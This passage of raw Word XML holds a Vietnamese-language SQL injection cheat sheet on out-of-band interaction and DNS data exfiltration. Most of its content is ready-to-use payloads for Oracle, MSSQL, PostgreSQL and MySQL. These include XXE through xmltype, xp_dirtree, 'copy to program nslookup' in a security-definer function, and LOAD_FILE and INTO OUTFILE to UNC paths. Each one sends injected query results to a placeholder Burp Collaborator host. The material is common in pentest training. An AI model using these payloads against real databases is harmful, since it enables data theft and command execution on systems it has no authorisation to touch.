              <w:t>('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119F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9FF" w:rsidTr="00F119FF"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 w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>UTL_INADDR.get_host_address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>('BURP-COLLABORATOR-SUBDOMAIN')</w:t>
            </w:r>
          </w:p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 w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Kỹ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thuật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sau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đây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hoạt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động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trên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các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cài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đặt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>đã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vá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đầy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đủ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>nhưng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yêu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cầu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quyền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cao</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>hơn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exec master..</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>xp_dirtree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> '//BURP-COLLABORATOR-SUBDOMAIN/a'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copy (SELECT '') to program '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> BURP-COLLABORATOR-SUBDOMAIN'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F119FF" w:rsidTr="00F119FF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr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F119FF" w:rsidRP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t>LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F119FF">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF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Windown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F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>TRA CỨU DNS VỚI VIỆC LỌC DỮ LIỆU (*)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F119FF" w:rsidRDefault="00F119FF" w:rsidP="00F119FF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khiến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cơ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sở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dữ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liệu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cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>đến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miền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bên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ngoài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chứa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kết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quả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của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được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tiêm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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thực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hiện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việc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này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sẽ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cần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Burp Collaborator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tạo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một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miền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phụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>duy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nhất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mà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bạn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sẽ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sử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dụng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trong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cuộc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tấn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công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của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mình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sau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thăm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dò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máy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chủ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>để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lấy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thông</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin chi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tiết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về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bất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kỳ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tương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tác</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bao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gồm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cả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dữ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liệu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đã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rò</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F119FF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rỉ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F119FF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F4" w:rsidTr="006F08F4"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 w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SELECT EXTRACTVALUE(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>xmltype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08F4" w:rsidTr="006F08F4"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 w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>xp_dirtree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> "//'+@</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>p+'.BURP-COLLABORATOR-SUBDOMAIN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>/a"')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08F4" w:rsidTr="006F08F4"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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr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 xml:space="preserve">create OR replace function </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>) returns void as $$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declare c text;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declare p text;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begin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SELECT into p (SELECT YOUR-QUERY-HERE);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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>c :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>= 'copy (SELECT '''') to program ''</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';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execute c;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END;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F08F4" w:rsidRP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 xml:space="preserve">$$ language </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>plpgsql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> security definer;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F08F4" w:rsidRDefault="006F08F4" w:rsidP="006F08F4">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SELECT f();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08F4" w:rsidTr="006F08F4"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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006F08F4" w:rsidRDefault="006F08F4" w:rsidP="00F119F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Windown</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006F08F4" w:rsidRDefault="006F08F4" w:rsidP="00F119FF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F08F4">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006F08F4" w:rsidRPr="00F119FF" w:rsidRDefault="006F08F4" w:rsidP="00F119FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006F08F4" w:rsidRPr="00F1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82"/>
    <w:rsid w:val="00216282"/>
    <w:rsid w:val="006F08F4"/>
    <w:rsid w:val="007F251B"/>
    <w:rsid w:val="00F1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D431"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1DA2AD9C-01E1-47CC-A2A3-4F573109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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-01T08:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-01T09:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>